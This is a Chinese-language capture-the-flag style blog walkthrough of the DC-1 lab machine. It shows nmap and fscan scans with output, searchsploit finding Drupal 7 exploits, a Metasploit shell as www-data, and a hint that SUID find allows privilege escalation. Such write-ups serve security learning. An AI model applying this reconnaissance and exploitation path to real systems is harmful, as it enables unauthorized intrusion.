DC-1
author:leadlife
data:2023/5/11
blog:Tripse Blog
demonstration:靶机原本意图是获取所有 Flag,这里懒得弄,有兴趣可以自行去找
本次测试使用到的工具如下:
信息收集:nmap,fscan,cmseek,searchsploit
获取 SHELL:MSF
内部信息收集:无
权限提升:无
外部信息收集
Nmap ICMP 扫描发现主机
其中 10.10.10.128 IP 为我们的测试靶机
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
leadlife@endeavrouOS ~/p/DC1> sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:31 CST Nmap scan report for 10.10.10.128 Host is up (0.00011s latency). MAC Address: 08:00:27:0C:90:9D (Oracle VirtualBox virtual NIC) Nmap scan report for 10.10.10.254 Host is up (0.000025s latency). MAC Address: 00:50:56:EC:CF:01 (VMware) Nmap scan report for 10.10.10.1 Host is up. Nmap done: 256 IP addresses (3 hosts up) scanned in 0.43 seconds
Fsacn 探测开放端口
sudo fscan -h 10.10.10.128 -p 0-66535 -t 30
Nmap 进行详细端口扫描
sudo nmap -sS -T4 -sV -O -p22,80,111,50387 --min-rate 10000 -oN namp.all 10.10.10.128 -sC
# Nmap 7.93 scan initiated Thu May 11 18:27:05 2023 as: nmap -sS -T4 -sV -O -p22,80,111,50387 --min-rate 10000 -oN namp.all -sC 10.10.10.128 Nmap scan report for 10.10.10.128 Host is up (0.00021s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4d659e6774c227a961660678b42488f (DSA) | 2048 1182fe534edc5b327f446482757dd0a0 (RSA) |_ 256 3daa985c87afea84b823688db9055fd8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-title: Welcome to Drupal Site | Drupal Site | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: Apache/2.2.22 (Debian) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35804/udp6 status | 100024 1 41727/udp status | 100024 1 50387/tcp status |_ 100024 1 52241/tcp6 status 50387/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:0C:90:9D (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu May 11 18:27:20 2023 -- 1 IP address (1 host up) scanned in 15.41 seconds
判断 CMS
进来可以看见是 Drupal
CMSeek 判断 CMS 版本
searchsploit 搜寻 cms 版本漏洞
searchsploit drupal 7
发现不管是 version 7 还是 7 以上或以下均有漏洞可利用,调用 msf 进行尝试
获取 SHELL
MSF 漏洞利用尝试
这里若是真实渗透,不推荐一个一个 exp 去打,要确定细节,精准利用 exp
利用编号 1 exp 拿到了 SHELL
内部信息收集
为后续权限提升做准备
内核与发行版
SUID
这里 find 可以用于提权
SUDO
没有 sudo
www-data@DC-1:/var/www$ sudo -l bash: sudo: command not found